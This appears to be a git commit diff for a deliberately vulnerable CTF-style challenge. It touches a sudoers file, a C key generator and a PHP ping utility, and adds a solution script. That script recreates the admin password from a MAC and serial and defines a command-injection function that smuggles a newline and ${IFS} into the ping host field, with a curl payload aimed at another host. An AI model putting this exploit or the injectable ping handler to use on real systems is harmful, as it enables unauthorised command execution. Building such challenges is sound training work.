sudo env_keep fix; added chown for keygen: update_key; utils.php ping down to 2

2020-09-20 19:15:00 +02:00 · 2020-09-20 19:15:00 +02:00 · 6dd0aadd0d
commit 6dd0aadd0d
parent ee77cf25db
4 changed files with 44 additions and 4 deletions
--- a/conf/etc/sudoers
+++ b/conf/etc/sudoers
@ -1,5 +1,5 @@
 Defaults	env_reset
-Defaults	env_keep = "clearpassword"
+Defaults	env_keep = "key"
 Defaults	mail_badpass
 Defaults	secure_path="/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin"
 Defaults	logfile="/var/log/sudo.log"
--- a/keygen/keygen.c
+++ b/keygen/keygen.c
@ -73,8 +73,7 @@ unsigned* md5(const char *msg, int mlen)
 	static short rot1[] = { 5, 9, 14, 20 };
 	static short rot2[] = { 4, 11, 16, 23 };
 	static short rot3[] = { 6, 10, 15, 21 };
-	static short *rots[] = { rot0, rot1, rot2, rot3
-	};
+	static short *rots[] = { rot0, rot1, rot2, rot3 };
 	static unsigned kspace[64];
 	static unsigned * k;

@ -205,6 +204,7 @@ int gen_update_key()
 	{
 		system("/usr/bin/hexdump -n 32 -e '4/4 \"%08X\"' /dev/urandom > /etc/update_key");
 	}
+	chown("/etc/update_key", 1001, 1002);
 	chmod("/etc/update_key", 0600);	
 }

--- a/solution/solution.py
+++ b/solution/solution.py
@ -0,0 +1,40 @@
+import requests
+import hashlib
+
+def xorshift(x, y, z, w):
+    t = x
+    t = t ^ ((t << 11) & 0xFFFFFFFF)
+    t = t ^ (t >> 8)
+    x, y, z = y, z, w
+    w = (w ^ (w >> 19)) ^ t
+    return x, y, z, w, t
+
+def keygen(mac, serial):
+	l = 20
+	password = ""
+	md5a = hashlib.md5(mac).hexdigest()
+	md5b = hashlib.md5(serial).hexdigest()
+	w = int(md5a[0:8], 16)
+	x = int(md5a[8:16], 16)
+	y = int(md5a[16:24], 16)
+	z = int(md5a[24:32], 16)
+
+	for i in range(0, l):
+		x, y, z, w, t = xorshift(x, y, z, w)
+		password += md5b[t % 20]
+
+	return password
+
+def rce(username, password, host, payload):
+	requests.post("http://{}/utils.php".format(host), auth=auth(username, password), data={"action": "ping", "host": "127.0.0.1\n".format(payload.replace(' ', '${IFS}'))})
+
+def main():
+	serial = "D7F2959E8EE66CC06CB67C0D2B835273".encode("ascii")
+	mac = "ac:35:ee:ad:29:1b".encode("ascii")
+	host = "192.168.77.1"
+	payload = "curl 192.168.1.2:8080"
+	password = keygen(mac, serial)
+	print(password)
+	#rce("admin", password, host, payload)
+	
+main()
--- a/webpanel/utils.php
+++ b/webpanel/utils.php
@ -7,7 +7,7 @@ require_once("includes/nav.php");
 if ($_SERVER['REQUEST_METHOD'] === 'POST' && ($_POST['action'] === 'ping' || $_POST['action'] === 'traceroute') && isset($_POST['host']) && !empty($_POST['host'])) {
 	switch ($_POST['action']) {
 		case 'ping':
-			$cmd = '/bin/'.$_POST['action']. ' -c 4';
+			$cmd = '/bin/'.$_POST['action']. ' -c 2';
 		break;
 		case 'traceroute':
 			$cmd = '/usr/bin/'.$_POST['action'];